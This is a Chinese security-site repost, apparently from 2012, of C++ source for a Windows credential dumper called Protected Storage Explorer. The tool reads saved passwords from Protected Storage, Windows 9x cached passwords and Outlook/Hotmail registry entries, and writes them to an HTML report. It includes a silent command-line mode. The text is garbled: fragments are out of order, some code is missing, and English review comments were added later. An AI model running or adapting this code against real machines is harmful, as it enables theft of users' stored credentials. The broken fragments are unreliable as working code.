通过Protected Storage获取账号信息
来源:中国安全信息网 更新时间:2012-04-13
                

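我们知道,NT 以后的系统中有这样一个服务:Protected Storage。它用来储存本地密码和网上服务密码,包括填表时的“自动完成”数据以及 Outlook 对应的账号信息。相应地,以当前用户身份运行的程序就可以通过该服务读取已保存的账号信息。需要注意,Protected Storage 已被微软弃用:自 Windows Vista 起仅支持只读访问,微软建议改用 DPAPI。源代码如下(转载时页面丢失了部分代码,片段顺序也被打乱,下文并非完整可编译的源文件):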









"); SaveToDisk("\r\n"); } else{ SaveToDisk("\r\n"); SaveToDisk(""); SaveToDisk("\r\n"); } } return TRUE; } void EnumPStorage(BOOL Save){ typedef HRESULT (WINAPI *tPStoreCreateInstance)(IPStore **, DWORD, DWORD, DWORD); HMODULE hpsDLL; hpsDLL = LoadLibrary("pstorec.dll"); tPStoreCreateInstance pPStoreCreateInstance; pPStoreCreateInstance = (tPStoreCreateInstance)GetProcAddress(hpsDLL, "PStoreCreateInstance"); IPStorePtr PStore; HRESULT hRes = pPStoreCreateInstance(&PStore, 0, 0, 0); IEnumPStoreTypesPtr EnumPStoreTypes; hRes = PStore->EnumTypes(0, 0, &EnumPStoreTypes); if (!FAILED(hRes)) { GUID TypeGUID; char szItemName[512]; char szItemData[512]; char szResName[1512]; char szResData[512]; char szItemGUID[50]; while(EnumPStoreTypes->raw_Next(1,&TypeGUID,0) == S_OK){ wsprintf(szItemGUID,"%x",TypeGUID); IEnumPStoreTypesPtr EnumSubTypes; hRes = PStore->EnumSubtypes(0, &TypeGUID, 0, &EnumSubTypes); GUID subTypeGUID; while(EnumSubTypes->raw_Next(1,&subTypeGUID,0) == S_OK){ IEnumPStoreItemsPtr spEnumItems; HRESULT hRes = PStore->EnumItems(0, &TypeGUID, &subTypeGUID, 0, &spEnumItems); LPWSTR itemName; while(spEnumItems->raw_Next(1,&itemName,0) == S_OK){ wsprintf(szItemName,"%ws",itemName); char chekingdata[200]; unsigned long psDataLen = 0; unsigned char *psData = NULL; _PST_PROMPTINFO *pstiinfo = NULL; hRes = PStore->ReadItem(0,&TypeGUID,&subTypeGUID,itemName,&psDataLen,&psData,pstiinfo,0); if(lstrlen((char *)psData)<(psDataLen-1)) { int i=0; for(int m=0;mcbResource+1; if(nCount>1023) nCount=1023; lstrcpyn(buff, pce->abResource, nCount); buff[nCount] = 0; CharToOem(buff, buff2); if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE; lstrcpy(dat->pBuffer+dat->nBufPos,buff2); dat->nBufPos+=lstrlen(buff2)+1; nCount=pce->cbPassword+1; if(nCount>1023) nCount=1023; lstrcpyn(buff, pce->abResource+pce->cbResource, nCount); buff[nCount] = 0; CharToOem(buff, buff2); if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE; lstrcpy(dat->pBuffer+dat->nBufPos,buff2); 
// NOTE(review): the statement below is the tail of a callback whose opening lines
// are not intact on this page (presumably AddPass, the function CashedPass hands
// to WNetEnumCachedPasswords). It advances the write offset past the string just
// copied, including its NUL terminator, and returns TRUE.
dat->nBufPos+=lstrlen(buff2)+1; return TRUE; }

/*
 * CashedPass - list the entries delivered by MPR.DLL's WNetEnumCachedPasswords.
 *
 * As far as the visible callback fragment shows, each entry is packed into
 * dat.pBuffer as two consecutive NUL-terminated strings (resource, then
 * password). This function walks those pairs and passes each one to AddItemm().
 *
 * Save: forwarded unchanged to AddItemm(). The callers on this page pass TRUE
 *       on the save-to-file paths and FALSE when filling the list view.
 *
 * Callers on this page reach this function only when iS9x is set.
 *
 * Review notes, all visible in this block:
 *  - Neither LoadLibrary nor GetProcAddress is checked, so a missing DLL or
 *    export ends in a call through a NULL pointer.
 *  - malloc is unchecked, and the buffer is never freed or wiped although it
 *    holds the strings later passed as passwords.
 *  - The buffer is not zero-initialised and no visible code writes a final empty
 *    string after the last entry. The do/while therefore reads uninitialised
 *    heap when the callback is never invoked, and otherwise depends on the byte
 *    after the last entry happening to be zero.
 *  - (DWORD) &dat truncates the pointer on a 64-bit build.
 *  - szUser and szPass are declared but never used.
 */
void CashedPass(BOOL Save) {
    HMODULE hLib=LoadLibrary("MPR.DLL");
    PASSCACHECALLBACK_DATA dat;
    // 64 KiB scratch buffer filled by the callback; nBufPos is the next free offset.
    dat.pBuffer=(char *)malloc(65536);
    dat.nBufLen=65536;
    dat.nBufPos=0;
    pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(hLib, "WNetEnumCachedPasswords");
    // AddPass is called back per entry and receives &dat through the last argument.
    pWNetEnumCachedPasswords(NULL, 0, 0xff, AddPass, (DWORD) &dat);
    char *svStr;
    svStr=dat.pBuffer;
    // Walk the packed pairs; an empty string where a resource name should start
    // is treated as the end of the list.
    do {
        char *svRsc=svStr;
        svStr+=lstrlen(svStr)+1;
        char *svPwd=svStr;
        svStr+=lstrlen(svStr)+1;
        char szUser[1024];
        char szPass[1024];
        // Resource name and type are passed as empty strings on this path.
        AddItemm(Save,"","",svRsc,svPwd);
    }while(*svStr!='\0');
    FreeLibrary(hLib);
};
// NOTE(review): the line below is kept exactly as the page shows it. The macro's
// string body (apparently HTML markup) was stripped during extraction.
///////////////////////////////////////// #define TableHeader "

/////////////////////////////////////////////////////////////////////////////////////// 
/////////////////////////////////////////////////////////////////////////////////////// 
// //
//Protected Storage Explorer // 
// By Hirosh // 
//www.hirosh.net //
// //
// // 
//No CopyRights- Feel Free to Cut & Paste // 
// // 
// //
/////////////////////////////////////////////////////////////////////////////////////// 
/////////////////////////////////////////////////////////////////////////////////////// 


#include "stdafx.h"
#include 
#include "resource.h"
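#import "pstorec.dll" no_namespace

/*
 * File-scope state shared by the routines on this page.
 *
 * Extraction repair: the page had fused the #import directive with the next
 * declaration and lost its first letter ("har SavingFname"). The two lines are
 * separated again here; nothing else in this block is changed.
 */

// Output path: set from the command line or from the Save dialog elsewhere on
// this page. Presumably the file SaveToDisk() writes to (its body is not shown).
char SavingFname[MAX_PATH];

// List-view control of the main dialog, assigned in DLgProc on WM_INITDIALOG.
HWND hwndlistview;

// TRUE when WinMain's GetVersion() test selects the Windows 9x code path.
BOOL iS9x=FALSE;

// One mail account as collected by EnumOutlookAccounts().
// NOTE(review): the fields are 100 bytes each, but EnumOutlookAccounts copies
// into them with lstrcpy from a 150-byte registry buffer, so an oversized
// registry value overruns the field.
typedef struct TOOUTDATA{
char POPuser[100];
char POPpass[100];
char POPserver[100];
} OOUTDATA;

// Fixed table of at most 50 accounts, and the slot index used when filling it.
// NOTE(review): no bounds check of oIndex against 50 is visible on this page.
OOUTDATA OutlookData[50];
int oIndex=0;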

/*
 * EnumOutlookAccounts - walk the per-user "Internet Account Manager\Accounts"
 * subkeys and copy account details into the global OutlookData table.
 *
 * Only the opening of the function survives on this page: the text breaks off
 * inside the `for` loop at the end of this block, so the password handling, the
 * advance of the enumeration index and any cleanup are not visible. The notes
 * below cover the visible lines only.
 *
 * Defender's note: enumeration of this key and reads of its "HTTPMail
 * Password2" values by a process that is not the mail client are worth
 * monitoring.
 */
void EnumOutlookAccounts()
{
    // Start from an empty table. NOTE(review): oIndex is not reset in the visible
    // part, yet this function is called on more than one path on this page.
    ZeroMemory(OutlookData,sizeof(OutlookData));
    HKEY hkeyresult ,hkeyresult1;
    long l,i;
    char name[200],skey[200];
    DWORD dw2;
    FILETIME f;
    lstrcpy(skey,"Software\\Microsoft\\Internet Account Manager\\Accounts");
    // NOTE(review): KEY_ALL_ACCESS is requested although only reads are visible;
    // KEY_READ would be the least-privilege choice.
    LONG lResult=RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR ) skey,0,KEY_ALL_ACCESS, 
    &hkeyresult1 );
    if(ERROR_SUCCESS != lResult)
    return ;
    i=0;l=0;
    BYTE Data[150];
    BYTE Data1[150];
    DWORD size;
    int j;
    j=0;
    DWORD type=REG_BINARY;
    // One pass per account subkey. NOTE(review): the result of RegEnumKeyEx is
    // tested only by the loop condition, so the body still runs once, with a stale
    // `name`, after ERROR_NO_MORE_ITEMS is returned.
    while(l!=ERROR_NO_MORE_ITEMS){
    dw2=200;
    l=RegEnumKeyEx(hkeyresult1,i,name,&dw2,NULL,NULL,NULL,&f);
    // Rebuild "<accounts path>\<subkey name>". NOTE(review): the concatenation is
    // unbounded; a long subkey name can exceed skey's 200 bytes.
    lstrcpy(skey,"Software\\Microsoft\\Internet Account Manager\\Accounts");
    lstrcat(skey,"\\");
    lstrcat(skey,name);
    // NOTE(review): the return value is ignored, so hkeyresult may be
    // uninitialised or left over from the previous pass; no RegCloseKey for it
    // is visible.
    RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR )skey ,0,KEY_ALL_ACCESS, &hkeyresult );
    size=sizeof(Data);
    if(RegQueryValueEx ( hkeyresult, ( LPCTSTR )"HTTPMail User Name" , 0, &type, Data, &size )
    ==ERROR_SUCCESS)
    {
    // NOTE(review): the returned type is not verified and registry data is not
    // guaranteed to be NUL-terminated; lstrcpy also copies from a 150-byte buffer
    // into the 100-byte POPuser field.
    lstrcpy(OutlookData[oIndex].POPuser,(char *)Data);
    ZeroMemory(Data,sizeof(Data));
    lstrcpy(OutlookData[oIndex].POPserver,"Hotmail");
    // size is taken from Data but the read below targets Data1; both arrays are
    // 150 bytes, so the length passed is still correct.
    size=sizeof(Data);
    if(RegQueryValueEx ( hkeyresult, ( LPCTSTR )"HTTPMail Password2" , 0, &type, Data1, 
    &size ) ==ERROR_SUCCESS){
    int totnopass=0;
    char mess[100];
    // NOTE(review): this `int i` shadows the outer `long i` used as the
    // enumeration index. The page text ends in the middle of this statement.
    for(int i=2;i
"); SaveToDisk(resname); SaveToDisk(""); SaveToDisk(restype); SaveToDisk(""); SaveToDisk(usrname); SaveToDisk(""); SaveToDisk(pass); SaveToDisk("
"); SaveToDisk(usrname); SaveToDisk(""); SaveToDisk(pass); SaveToDisk("
" #define Table "
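// NOTE(review): the next line is extraction residue, kept verbatim. It appears to
// be the closing quote of the preceding `#define Table "` and an #include whose
// header name was stripped by the page.
" #include

/*
 * DLgProc - dialog procedure for the main window.
 *
 * WM_INITDIALOG: sets the icon and title, creates the list-view columns for
 *   the active code path (four columns when iS9x is FALSE, two when it is
 *   TRUE) and runs the matching enumeration with Save == FALSE.
 * WM_COMMAND / IDOK: asks for an output file name, then writes TableHeader,
 *   a column-title row, the enumerated entries (Save == TRUE) and Table
 *   through SaveToDisk().
 * WM_COMMAND / IDCANCEL: closes the dialog and exits the process.
 *
 * Returns TRUE after WM_INITDIALOG and FALSE for everything else.
 *
 * Changes from the text on the page:
 *  - Line structure restored. On the page both functions sat on two physical
 *    lines, and WinMain followed a `//` on the same line.
 *  - ofn.lpstrFile pointed at a string literal while nMaxFile claimed
 *    sizeof(szFile); GetSaveFileName writes the chosen path into lpstrFile,
 *    so the writable szFile buffer is used and pre-filled with the same
 *    default name.
 *  - Appending ".htm" is skipped when it would not fit in SavingFname.
 *  - Removed a doubled `;` and a duplicate `break`.
 *
 * NOTE(review): OFN_FILEMUSTEXIST is kept as found although it is unusual for
 * a save dialog. The procedure is declared LRESULT CALLBACK and cast to
 * DLGPROC by WinMain; the signature is left alone to keep that call intact.
 */
LRESULT CALLBACK DLgProc(HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam)
{
    OPENFILENAME ofn;
    char szFile[MAX_PATH];

    switch (message) {
    case WM_INITDIALOG:
        SendMessage(hDlg, WM_SETICON, ICON_SMALL,
                    (LPARAM)LoadIcon(GetModuleHandle(0), MAKEINTRESOURCE(IDI_ICON1)));
        if (!iS9x)
            SetWindowText(hDlg, "Protected Storage www.hirosh.NET");
        else
            SetWindowText(hDlg, "Cashed Passwords www.hirosh.NET");
        hwndlistview = GetDlgItem(hDlg, IDC_LIST3);
        LVCOLUMN lvcol;
        if (!iS9x) {
            lvcol.mask = LVCF_TEXT;
            lvcol.pszText = "Resource Name";
            ListView_InsertColumn(hwndlistview, 0, &lvcol);
            ListView_SetColumnWidth(hwndlistview, 0, 160);
            lvcol.mask = LVCF_TEXT;
            lvcol.pszText = "Resource Type";
            ListView_InsertColumn(hwndlistview, 1, &lvcol);
            ListView_SetColumnWidth(hwndlistview, 1, 110);
            lvcol.mask = LVCF_TEXT;
            lvcol.pszText = "User Name/Value";
            ListView_InsertColumn(hwndlistview, 2, &lvcol);
            ListView_SetColumnWidth(hwndlistview, 2, 200);
            lvcol.mask = LVCF_TEXT;
            lvcol.pszText = "Password";
            ListView_InsertColumn(hwndlistview, 3, &lvcol);
            ListView_SetColumnWidth(hwndlistview, 3, 100);
            EnumOutlookAccounts();
            EnumPStorage(FALSE);
        } else {
            lvcol.mask = LVCF_TEXT;
            lvcol.pszText = "User Name/Value";
            ListView_InsertColumn(hwndlistview, 0, &lvcol);
            ListView_SetColumnWidth(hwndlistview, 0, 250);
            lvcol.mask = LVCF_TEXT;
            lvcol.pszText = "Password";
            ListView_InsertColumn(hwndlistview, 1, &lvcol);
            ListView_SetColumnWidth(hwndlistview, 1, 150);
            CashedPass(FALSE);
        }
        ListView_SetExtendedListViewStyle(hwndlistview, LVS_EX_FULLROWSELECT);
        return TRUE;

    case WM_COMMAND:
        switch (LOWORD(wParam)) {
        case IDOK:
            ZeroMemory(&ofn, sizeof(OPENFILENAME));
            ofn.lStructSize = sizeof(OPENFILENAME);
            ofn.hwndOwner = hDlg;
            // The dialog writes the selected path back into lpstrFile, so it
            // must be a writable buffer of at least nMaxFile bytes.
            lstrcpy(szFile, "pstectedstorage.htm");
            ofn.lpstrFile = szFile;
            ofn.nMaxFile = sizeof(szFile);
            ofn.lpstrFilter = "Htm\0*.htm\0";
            ofn.nFilterIndex = 1;
            ofn.lpstrFileTitle = NULL;
            ofn.nMaxFileTitle = 0;
            ofn.lpstrInitialDir = NULL;
            ofn.Flags = OFN_PATHMUSTEXIST | OFN_FILEMUSTEXIST;
            if (GetSaveFileName(&ofn) == TRUE) {
                lstrcpy(SavingFname, ofn.lpstrFile);
                // Append the extension only when the result still fits.
                if (strstr(SavingFname, ".htm") == 0 &&
                    lstrlen(SavingFname) + 4 < MAX_PATH)
                    lstrcat(SavingFname, ".htm");
                SaveToDisk(TableHeader);
                if (!iS9x) {
                    SaveToDisk("Resource Name Resource Type User Name/ValuePassword");
                    EnumOutlookAccounts();
                    EnumPStorage(TRUE);
                } else {
                    SaveToDisk("User Name/ValuePassword");
                    CashedPass(TRUE);
                }
                SaveToDisk(Table);
            }
            break;
        case IDCANCEL:
            EndDialog(hDlg, LOWORD(wParam));
            ExitProcess(0);
            break;
        }
    }
    return FALSE;
}

//
/*
 * WinMain - program entry point.
 *
 * Selects the code path from GetVersion(): a negative value (high bit set)
 * sets iS9x. With an empty command line the dialog is shown. Otherwise the
 * command line is taken as the output file name and the report is written
 * without any UI.
 *
 * Changes from the text on the page: the command line is copied with a bound
 * (it was an unbounded lstrcpy into a MAX_PATH buffer), and the first
 * character is compared with '\0' rather than NULL.
 */
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    if ((int)GetVersion() < 0)
        iS9x = TRUE;
    else
        iS9x = FALSE;

    if (lpCmdLine[0] == '\0') {
        InitCommonControls();
        DialogBox(hInstance, (LPCTSTR)IDD_DIALGMAIN, 0, (DLGPROC)DLgProc);
    } else {
        // lstrcpyn copies at most MAX_PATH - 1 characters and always terminates.
        lstrcpyn(SavingFname, lpCmdLine, MAX_PATH);
        SaveToDisk(TableHeader);
        if (!iS9x) {
            SaveToDisk("Resource Name Resource Type User Name/ValuePassword");
            EnumOutlookAccounts();
            EnumPStorage(TRUE);
        } else {
            SaveToDisk("User Name/ValuePassword");
            CashedPass(TRUE);
        }
        SaveToDisk(Table);
    }
    return 0;
}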